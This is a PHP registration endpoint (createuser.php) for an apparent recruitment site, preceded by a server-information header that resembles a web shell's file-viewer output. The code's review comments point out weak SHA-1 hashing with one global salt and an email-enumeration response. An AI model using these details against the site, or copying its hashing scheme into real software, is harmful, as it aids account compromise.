Server: nginx/1.24.0
System: Linux webserver-one 6.8.0-101-generic #101-Ubuntu SMP PREEMPT_DYNAMIC Mon Feb 9 10:15:05 UTC 2026 x86_64
User: www-data (33)
PHP: 8.4.18
Disabled: NONE
File: /srv/www/rectt-csmcri.res.in/public_html/createuser.php
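<?php
/**
 * Registration endpoint: stores one `users` row per (email, ad_id) pair.
 *
 * Expects a POST carrying `mypassword`, `myemail` and `ad_id`. Prints the
 * literal string "true" on success and an HTML alert fragment otherwise; any
 * other request method is redirected to register.php.
 *
 * $conn (a mysqli connection) and $salt are not defined in this file;
 * presumably sites/config/config.php provides them -- confirm.
 */
ob_start();
session_start();
include_once 'sites/config/config.php';

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header('Location: register.php');
    exit;
}

$rawPassword = $_POST['mypassword'] ?? null;
$rawEmail = $_POST['myemail'] ?? null;
$rawAdId = $_POST['ad_id'] ?? null;

// PHP decodes `field[]=x` into an array, and a missing field is null. Either
// one reaching stripslashes()/real_escape_string() is a TypeError or a
// deprecation warning, so reject anything that is not a non-empty string.
$fieldsPresent = is_string($rawPassword) && $rawPassword !== ''
    && is_string($rawEmail) && $rawEmail !== ''
    && is_string($rawAdId);

// ad_id is bound as an integer below; validate it instead of letting a
// non-numeric value be coerced silently.
$adId = $fieldsPresent ? filter_var($rawAdId, FILTER_VALIDATE_INT) : false;

if (!$fieldsPresent || $adId === false || filter_var($rawEmail, FILTER_VALIDATE_EMAIL) === false) {
    echo "<div class=\"alert alert-danger\">Invalid registration data. Please check the form and try again.</div>";
    $conn->close();
    ob_end_flush();
    exit;
}

// NOTE(review): stripslashes() and real_escape_string() give no injection
// protection here -- the bound parameters below already do that -- and they
// alter the stored value (an apostrophe is stored with a backslash in front).
// They are kept only because the stored e-mail and the hash input have to
// match whatever the login code computes, which is not visible in this file.
// Drop them in both places together.
$email = $conn->real_escape_string(stripslashes($rawEmail));
$passwordInput = $conn->real_escape_string(stripslashes($rawPassword));

// NOTE(review): SHA-1 with one application-wide salt is a fast, unsalted-per-
// user digest and does not resist offline guessing if the table leaks. Move to
// password_hash() / password_verify() and rehash existing accounts at their
// next successful login; that needs a matching change in the login code, so
// the stored format is left as it was.
$passwordHash = sha1($passwordInput . $salt);

// 'created' | 'duplicate' | 'error'
$outcome = 'error';

try {
    $check = $conn->prepare('SELECT 1 FROM users WHERE email = ? AND ad_id = ? LIMIT 1');
    if ($check === false) {
        throw new RuntimeException('duplicate check could not be prepared');
    }
    $check->bind_param('si', $email, $adId);
    $check->execute();
    $found = $check->get_result();
    if ($found === false) {
        throw new RuntimeException('duplicate check could not be executed');
    }
    $alreadyRegistered = $found->num_rows !== 0;
    $check->close();

    if ($alreadyRegistered) {
        $outcome = 'duplicate';
    } else {
        // created_at is expected to be filled by the column default (per the
        // original author's note; the schema is not visible here).
        $insert = $conn->prepare('INSERT INTO users (`password`, `email`, `ad_id`) VALUES (?, ?, ?)');
        if ($insert === false) {
            throw new RuntimeException('insert could not be prepared');
        }
        $insert->bind_param('ssi', $passwordHash, $email, $adId);
        if ($insert->execute()) {
            $outcome = 'created';
        } elseif ($insert->errno === 1062) {
            // ER_DUP_ENTRY with mysqli error reporting switched off.
            $outcome = 'duplicate';
        }
        $insert->close();
    }
} catch (RuntimeException $e) {
    // mysqli_sql_exception extends RuntimeException. Two requests can both
    // pass the SELECT above before either inserts; only a UNIQUE index on
    // (email, ad_id) closes that window, and it reports the loser as 1062.
    // NOTE(review): confirm that index exists.
    $outcome = ($e instanceof mysqli_sql_exception && $e->getCode() === 1062) ? 'duplicate' : 'error';
    if ($outcome === 'error') {
        // Details go to the server log only, never to the client.
        error_log('createuser.php: ' . $e->getMessage());
    }
}

$conn->close();

if ($outcome === 'created') {
    // The session starts carrying account state here, so issue a fresh id
    // rather than keeping one that existed before registration.
    session_regenerate_id(true);
    $_SESSION['email'] = $email;
    // Stored as a string, as before, for any page that compares it strictly.
    $_SESSION['ad_id'] = (string) $adId;
    $_SESSION['registration_success'] = "true";
    echo "true";
} elseif ($outcome === 'duplicate') {
    // NOTE(review): this response tells an unauthenticated caller whether an
    // address has applied to a given advertisement; consider request
    // throttling or a neutral message if that is sensitive.
    echo "<div class=\"alert alert-danger alert-dismissable\">
     <button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-hidden=\"true\">&times;</button>
     This email has already been used to apply for the selected advertisement.
     </div>";
} else {
    echo "<div class=\"alert alert-danger\">Failed to register user. Please try again later.</div>";
}

ob_end_flush();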